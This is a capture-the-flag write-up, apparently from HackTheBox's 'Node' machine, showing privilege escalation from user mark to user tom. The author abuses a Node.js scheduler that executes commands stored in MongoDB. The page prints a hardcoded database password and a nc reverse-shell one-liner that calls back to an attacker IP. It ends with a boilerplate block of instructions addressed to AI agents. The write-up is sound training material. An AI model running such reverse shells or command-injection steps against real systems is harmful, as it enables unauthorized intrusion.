# 5 mark > tom ``` # explored a lot of stuff # reusing password # connecting mongo failed with mark creds # looking at processes running as tom mark@node:/opt$ ps fuaxwww | grep tom mark 23909 0.0 0.1 14228 940 pts/0 S+ 19:15 0:00 \_ grep --color=auto tom tom 1225 5.5 5.7 1045320 43720 ? Ssl 18:20 3:01 /usr/bin/node /var/www/myplace/app.js tom 1229 0.0 4.0 1074616 30708 ? Ssl 18:20 0:01 /usr/bin/node /var/scheduler/app.js ``` ```js mark@node:/opt$ cat /var/scheduler/app.js const exec = require('child_process').exec; const MongoClient = require('mongodb').MongoClient; const ObjectID = require('mongodb').ObjectID; const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler'; MongoClient.connect(url, function(error, db) { if (error || !db) { console.log('[!] Failed to connect to mongodb'); return; } setInterval(function () { db.collection('tasks').find().toArray(function (error, docs) { if (!error && docs) { docs.forEach(function (doc) { if (doc) { console.log('Executing task ' + doc._id + '...'); exec(doc.cmd); db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) }); } }); } else if (error) { console.log('Something went wrong: ' + error); } }); }, 30000); }); ``` ``` # this script runs like a CRON and checks for any new record that is entered # runs the value in the 'cmd' key. $ mongosh --host localhost -u mark -p 5AYRft73VtFpc84k scheduler Current Mongosh Log ID: 614a235a4a2af76aa870faa9 Connecting to: mongodb://localhost:27017/scheduler?directConnection=true&serverSelectionTimeoutMS=2000 Using MongoDB: 3.2.16 Using Mongosh: 1.0.6 scheduler> show dbs MongoServerError: not authorized on admin to execute command { listDatabases: 1 } scheduler> show collections tasks scheduler> db.tasks.find({}) scheduler> db.tasks.insert({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.5 6969 >/tmp/f"}) DeprecationWarning: Collection.insert() is deprecated. Use insertOne, insertMany, or bulkWrite. { acknowledged: true, insertedIds: { '0': ObjectId("614a24be65c51bfc6927c5cc") } } scheduler> db.tasks.find({}) [ { _id: ObjectId("614a24be65c51bfc6927c5cc"), cmd: 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.5 6969 >/tmp/f' } ] $ nc -lvnp 6969 listening on [any] 6969 ... connect to [10.10.16.5] from (UNKNOWN) [10.10.10.58] 32822 bash: cannot set terminal process group (1229): Inappropriate ioctl for device bash: no job control in this shell To run a command as administrator (user "root"), use "sudo ". See "man sudo_root" for details. tom@node:/$ whoami;id whoami;id tom uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/node/5-mark-greater-than-tom.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.